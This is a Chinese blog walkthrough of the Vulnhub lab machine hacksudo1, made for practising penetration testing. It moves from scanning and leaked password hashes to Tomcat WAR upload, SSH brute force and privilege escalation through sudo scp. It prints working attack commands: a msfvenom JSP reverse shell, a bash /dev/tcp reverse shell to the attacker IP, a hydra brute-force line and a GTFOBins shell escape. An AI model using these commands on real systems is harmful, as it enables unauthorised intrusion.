Vulnhub靶机:hacksudo1

已于 2024-02-03 13:55:38 修改
阅读量823 收藏 19
点赞数 21
分类专栏: 靶场 文章标签: web安全
于 2024-02-03 13:26:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/136007089
版权

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:hacksudo1(10.0.2.43)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/hacksudo-101,650/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.43

在这里插入图片描述

使用nmap端口扫描发现,靶机开放端口:80、2222、8080

在这里插入图片描述

80端口:打开网站分析是一个登录界面

在这里插入图片描述

直接使用dirsearch工具爆破目录,发现users.sql、info.txt文件泄露两个用户密码

在这里插入图片描述

jimit@example.com:b15fbfaac3776e5a2ad330fbf7976da7,解密:100596

admin@example.com:21232f297a57a5a743894a0e4a801fc3,解密:admin

在这里插入图片描述
在这里插入图片描述

直接使用用户名密码登录网站,但网站没有可利用的功能点

8080端口:打开网站发现是tomcat控制台,可以尝试使用之前获得的用户名密码登录

在这里插入图片描述

三、漏洞利用

使用admin:admin登录成功,可以通过war包部署上传webshell。

msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.2.15" LPORT=4444 -f war > cmdmsf.war

在这里插入图片描述

上传成功,访问上传的webshell,反弹shell

在这里插入图片描述
在这里插入图片描述

获取交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

查看是否存在特权命令,和具有可利用的root权限的文件,未发现

find / -perm -u=s -type f 2>/dev/null

进入靶机home目录,发现靶机存在两个用户hacksudo、vishal。

把两个用户各个文件夹都翻一翻,发现/home/vishal/office目录下存在可疑文件

在这里插入图片描述
在这里插入图片描述

执行hacksudo文件,hacksudo会先设置uid为1000,并运行/home/vishal/office/manage.sh脚本,但manage.sh我们没有写权限、hacksudo文件我们没有执行权限,暂时无法利用。

发现在/home/hacksudo目录下存在getmanager可执行文件,执行可以看到和/home/vishal/office/manage.sh脚本里面的运行效果是一样的,怀疑getmanager文件其实就是/home/vishal/office目录下的hacksudo文件

在这里插入图片描述
在这里插入图片描述

根据提示可以使用hydra对两个用户的ssh进行暴力破解,暴力破解vishal成功vishal:hacker

hydra -l vishal -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.43:2222  -t 64

在这里插入图片描述

使用ssh登录vishal用户

ssh vishal@10.0.2.43 -p 2222

在这里插入图片描述

未发现特权命令

现在我们有了修改manage.sh的权限,接下来我们可以修改/home/vishal/office/manage.sh脚本,运行在/home/hacksudo/getmanager文件进行提权

echo 'bash -c "bash -i >& /dev/tcp/10.0.2.15/8888 0>&1"'>manage.sh

在这里插入图片描述

直接执行getmanager反弹shell失败,再次监听端口等待一会,莫名其妙得到hacksudo权限,应该是hacksudo有计划任务,可以上传pspy64进行查看

在这里插入图片描述
在这里插入图片描述

使用hacksudo权限寻找是否存在特权命令,发现/usr/bin/scp命令,执行不需要输入密码

在这里插入图片描述

使用网站GTFOBins搜索scp命令利用方法

在这里插入图片描述

使用scp通过生成交互式系统 shell 来突破受限环境。

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

在这里插入图片描述

获取flag

在这里插入图片描述
在这里插入图片描述

关于vishal的密码还可以通过其他方法获得

/var/backups/hacksudo目录下存在vishal.jpg、hacksudo.zip、log.txt文件

在这里插入图片描述

可以使用cp命令将文件复制到tomcat目录/opt/tomcat/webapps/cmdmsf,在主机使用wget获取文件

发现vishal.jpg图片存在隐写

在这里插入图片描述
在这里插入图片描述

获得一组字符串

在这里插入图片描述

使用凯撒密码解密,md5解密,获得password

backup of hacksudo machine user
user vishal
password 985aa195c09fb7d64a4bb24cfe51fb1f13ebc444c494e765ee99d6c3ef46557c757787f8f5a6e0260d2e0e846d263fbfbe1311c884bb0bf9792f8778a4434327

在这里插入图片描述

在这里插入图片描述

huang0c
关注
  • 21
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
2024中国网络安全产品用户调查报告(发布版)
2301_76786857的博客
06-12 703
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
weixin_43822401的博客
06-16 418
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者通过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
【网络安全的神秘世界】AppScan安装及使用指南
最新发布
weixin_54750312的博客
06-16 228
动态的web扫描,爬取目标网站的接口、链接,通过扫描器自身的扫描逻辑去发送一些特定的http请求数据包,根据服务端的返回内容来判断存在哪些漏洞。AppScan是一种综合型漏洞扫描工具,采用SaaS解决方案,它将所以测试功能整合到一个服务中,避免了因操作系统不同带来的安装问题。ASoC使用安装在应用程序上的代理,通过监控所有的交互流量,在应用程序运行期间识别安全漏洞。checkmark:非编译扫描,代码是什么样它就什么样。fortify:编译扫描,需要一定的环境依赖。动态分析(DAST)——黑盒扫描。
网络安全(补充)
m0_62207482的博客
06-16 510
网络蠕虫是一种具有自我复制和传播能力、可独立自动运行的恶意程序,属于主动传播。属于被动传播的有计算机病毒、特洛伊木马、逻辑炸弹、细菌、恶意脚本、恶意Active X控件、间谍软件等 文件型病毒系计算机病毒德意志,主要通过感染计算机中的可执行文件(.exe)和命令文件(.com)。把所有通过操作系统的文件系统进行感染的病毒都称作文件病毒。可以感染所有标准的DOS可执行文件:包括批处理文件、DOS下的可加载驱动程序(.SYS)文件以及普通的COM/EXE可执行文件。由于HTML文件无法嵌入二进制执行代码,且是
web安全渗透测试十大常规项(一):web渗透测试之任意文件读取
HACKONE的博客
06-16 35
file、path、data、filepath、readfile、data、url、realpath等。download,down,readfile,read,del,dir,path,src,Lang等。常规下载URL:http://www.xiaodi8.com/upload/123.pdf。利用:常规下载敏感文件(数据库配置,中间件配置,系统密匙等文件信息)上传类函数,删除类函数,下载类函数,目录操作函数,读取查看函数等。文件上传,文件下载,文件删除,文件管理器等地方。2、文件删除(常出现后台中)
web安全渗透测试十大常规项(一):web渗透测试之文件包含漏洞
HACKONE的博客
06-16 35
参考:https://blog.csdn.net/unexpectedthing/article/details/121276653。url编码2次:php://filter/write=convert.base64-decode/resource=123.php。url编码2次:php://filter/write=string.rot13/resource=2.php。URL中有path、dir、file、pag、page、archive、p、eng、语言文件等相关字眼。
车载网络安全指南 网络安全框架(二)
qq_42357877的博客
06-12 857
汽车电子系统网络安全活动框架包含汽车电子系统网络安全活动、组织管理以及支持保障。其中,网络安全管理活动是框架的核心,主要指汽车电子系统生命周期各阶段开展相关安全活动,这些阶段包括概念设计阶段,系统层面的产品开发阶段,硬件层面的产品开发阶段,软件层面的产品开发阶段,产品生产、运行和服务阶段。组织可以根据自身实际情况,对网络安全活动框架中各个部分进行配置和裁剪,并考虑与组织现有的管理体系的机构设置、过程活动相结合,以便落实文档中建议的网络安全措施,以较小的代价实现高效的网络安全
web安全渗透测试十大常规项(一):web渗透测试之PHP反序列化
HACKONE的博客
06-16 537
POP:面向属性编程(Property-Oriented Programing)常用于上层语言构造特定调用链的方法,序列化攻击都在PHP魔术方法中出现可利用的漏洞,因自动调用触发漏洞,但如关键代码没在魔术方法中,而是在一个类的普通方法中。漏洞危害:如存在__wakeup方法,调用unserilize()方法前则先调用__wakeup方法,但序列化字符串中表示对象属性个数的值大于真实属性个数时会跳过__wakeup执行。__isset(): //在不可访问的属性上调用isset()或empty()触发。
【网络安全】网络安全基础精讲 - 网络安全入门第一篇
goldfish8848的博客
06-11 1311
网络安全基础知识
网络安全 - kali 安装
z339521的博客
06-13 518
安装 kali
web安全渗透测试十大常规项(一):web渗透测试之XML和XXE外部实体注入
HACKONE的博客
06-16 33
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网扫描、攻击内网等危害。1、获取Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试。
《电力网络安全事件应急预案》
lurenjia404的博客
06-12 846
各电力企业负责电力网络安全事件的应对工作,负责建立健全本企业的电力网络安全事件应对工作机制,具体负责本企业电力网络安全事件的预防、监测、报告和应急处置工作,在国家能源局及其派出机构的组织下,为其他电力企业的电力网络安全事件应对提供技术支持。各电力企业应按职责做好电力网络安全事件日常预防工作,做好网络安全检查、隐患排查、风险评估和容灾备份,健全本单位网络安全监测预警和信息通报机制,及时采取有效措施,减少和避免电力网络安全事件的发生及危害,提高应对电力网络安全事件的能力。做好预警信息要求的其他工作。
未来汽车网络安全行业发展趋势分析
A526847的博客
06-12 709
汽车制造商和服务提供商将加强漏洞的发现、报告、修复和验证等环节的管理,确保汽车网络安全漏洞得到及时有效的处理。汽车制造商和服务提供商将加强用户数据的收集、存储、使用和共享等环节的管理,确保用户数据的安全和隐私。随着车辆功能的日益智能化、网联化,汽车网络安全问题已不再是单一的技术问题,而是涉及到国家安全、社会公共安全、个人隐私安全等多方面的综合性问题。随着法规与标准的日益完善、技术创新的驱动、产业链协同作战的加强、安全漏洞管理的重视以及用户隐私保护的关注,汽车网络安全行业将不断取得新的进展和发展。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值